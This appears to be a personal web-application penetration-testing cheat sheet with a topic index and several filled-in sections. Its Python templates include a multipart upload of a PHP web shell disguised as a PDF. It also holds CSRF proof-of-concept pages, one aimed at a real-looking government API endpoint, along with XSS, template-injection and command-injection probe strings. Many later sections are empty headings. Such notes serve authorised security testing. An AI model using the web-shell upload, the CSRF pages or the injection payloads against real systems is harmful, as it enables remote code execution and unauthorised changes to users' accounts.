web

Web Application Security Attacks

• Burpsuite
• Templates
• Application
  • Open Redirect
  • HTTP Parameter Pollution
  • Cross Site Request Forgery
  • HTML Injection
  • CRLF Injection
  • XS-Search
  • Cross Site Sripting
  • Template Injection
  • IDOR
  • Type Confusion
  • CORS Misconfiguration
  • Logic Bugs
• Server
  • Local/Remote File Inclusion
  • SQL Injection
  • Server Side Request Forgery
  • XML External Entity Vulnerability
  • Insecure Deserialization
  • Prototype Pollution
  • ESI injection
  • Remote Code Execution
• Cloud/Network
  • Sub Domain Takeover
  • OAuth
  • SAML
  • Parser Exploitation
  • AWS buckets
  • AppCache
  • Cache Deception
  • Cache Poisoning
  • Proxy Attacks
  • HTTP Desync
• Multiple/Other
  • XSS + CSRF
  • XSS + TRACE
  • SSRF + CRLF
  • Jenkins
• Firewall Bypasses
• Flash
• Spreadsheets
• Wordpress
• PayloadsAllTheThings

Burpsuite

#Add whole subdomain to scope REGEX
.*\.test\.com$

Templates

Script template

import requests
from colorama import Fore, Back, Style

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

proxies = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def format_text(title, item):
	cr = '\r\n'
	section_break = cr + "*" * 20 + cr
	item = str(item)
	text = Style.BRIGHT + Fore.RED + title + Fore.RESET + section_break + item + section_break
	return text

r = requests.get('https://umich.com', verify=False, proxies=proxies)
print format_text('r.status_code is: ', r.status_code)
print format_text('r.headers is: ', r.headers)
print format_text('r.cookies is: ', r.cookies)
print format_text('r.text: ', r.text)

Post form data

# Post form data
proxies = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}
multipart_form_data = {
    'file': ('aloha.php', '<?php system($_GET[\'cmd\']); ?>', 'application/pdf'),
    'submit' : (None, 'Send')
}
r = requests.post('http://127.0.0.2/contact.php', verify=False, proxies=proxies, files=multipart_form_data)

Application

Open Redirect

http://evil.url

Upgrade to Response Splitting

Cross Site Request Forgery

#GET example
<html>
	<body>
		<script>history.pushState('', '', '/')</script>
			<form action="https://127.0.0.1/vulnerable/endpoint?param=value1&param2=value2" method="POST">
				<input type="submit" value="Submit request" />
			</form>
	</body>
</html>

#POST example
<html>
	<body>
		<script>history.pushState('', '', '/')</script>
			<form action="https://127.0.0.1/vulnerable/endpoint" method="POST">
				<input type="hidden" name="param1" value="value1" />
				<input type="hidden" name="param2" value="value2" />
				<input type="submit" value="Submit request" />
			</form>
	</body>
</html>

<html>
	<title>JSON CSRF POC</title>
	<body>
		<center>
			<h1> JSON CSRF POC </h1>
			<script>
				fetch('https://acdhub.service.ncsc.gov.uk/api/v1-0-39/Users/preferences', {method: 'POST', credentials: 'include', headers: {'Content-Type': 'text/plain'}, body: '{"preferences":[{"key":"receiveEmails","value":"false"}]}'});
			</script>
			<form action="#">
				<input type="button" value="Submit" />
			</form>
		</center>
	</body>
</html>

#JSON example
<html>
	<body>
		<script>history.pushState('', '', '/')</script>
			<form action="https://127.0.0.1/vulnerable/endpoint" method="POST">
				<input name='{"param1":"value1", "param2":"'value='"}'>
				<input type="submit" value="Submit request" />
			</form>
	</body>
</html>

Attacking local services

Cross Site Scripting

<script>alert(1)</script>
<svgonload=alert(1)>

Template Injection

input=%7B%7B7%2A7%7D%7D # {{7*7}}

Sandbox Escape

XML External Entities

Local DTD files

Remote Code Execution

input=%3Bdir

Insecure API